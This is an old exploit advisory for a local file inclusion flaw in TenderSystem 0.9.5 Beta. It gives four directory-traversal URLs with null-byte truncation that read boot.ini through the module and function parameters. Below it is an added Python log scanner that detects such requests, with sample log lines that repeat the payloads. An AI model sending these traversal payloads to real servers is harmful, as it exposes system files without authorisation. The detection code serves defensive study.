
tendersystem-lfi.txt

Posted on 15 December 2009

-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS
I was unable to get this to work on a Linux server. Further testing may be required.
-------------------------------------------------------------------------------------------
Target:   TenderSystem
Version:  0.9.5 Beta
Site:     http://www.tendersystem.com/
Demo:     http://demo.tendersystem.com/
Date:     2-14-2009
-------------------------------------------------------------------------------------------
Author:   Packetdeath
Homepage: www.ssteam.ws
Contact:  yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
-------------------------------------------------------------------------------------------
Exploit:

http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------
Vuln code in main.php:

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------
Some things are better left unsaid <3 ... That is all.

/Packetdeath
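A defender-side check for the request pattern in this advisory, added here as an example and not part of the original post: it scans web access logs for `module` and `function` values that contain directory traversal or an encoded null byte. The log lines are constructed, and treating legitimate values as bare identifiers is an assumption about the application.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameters the advisory shows being used to reach files outside the application.
WATCHED_PARAMS = {"module", "function"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SAFE_VALUE_RE = re.compile(r"[A-Za-z0-9_]*")  # assumption: values are bare identifiers
# Constructed access-log lines; the request paths mirror the advisory's own URLs.
SAMPLE_LOG = [
    '127.0.0.1 - - [15/Dec/2009:10:00:00 +0000] "GET /tendersystem/main.php?module=session&function=login HTTP/1.1" 200 512',
    '127.0.0.1 - - [15/Dec/2009:10:00:05 +0000] "GET /tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login HTTP/1.1" 200 211',
    '127.0.0.1 - - [15/Dec/2009:10:00:09 +0000] "GET /tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg HTTP/1.1" 200 211',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised before matching."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def classify(value):
    """Return why a parameter value looks like an include-path attack ([] if clean)."""
    v = fully_decode(value).replace("\\", "/")  # treat Windows separators like "/"
    reasons = []
    if "\x00" in v:
        reasons.append("null-byte")
    if "../" in v or v.endswith(".."):
        reasons.append("traversal")
    if not reasons and not SAFE_VALUE_RE.fullmatch(v):
        reasons.append("non-identifier")
    return reasons


def scan(log_lines):
    """Return (line_no, param, reasons) for each suspicious watched parameter."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        query = urlsplit(m.group(1)).query if m else ""
        # Split the raw query ourselves so %00 reaches classify() still encoded.
        for pair in filter(None, query.split("&")):
            name, _, raw = pair.partition("=")
            reasons = classify(raw) if name in WATCHED_PARAMS else []
            if reasons:
                findings.append((n, name, reasons))
    return findings
```

Calling `scan(SAMPLE_LOG)` flags the second and third lines and leaves the ordinary `module=session&function=login` request alone.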
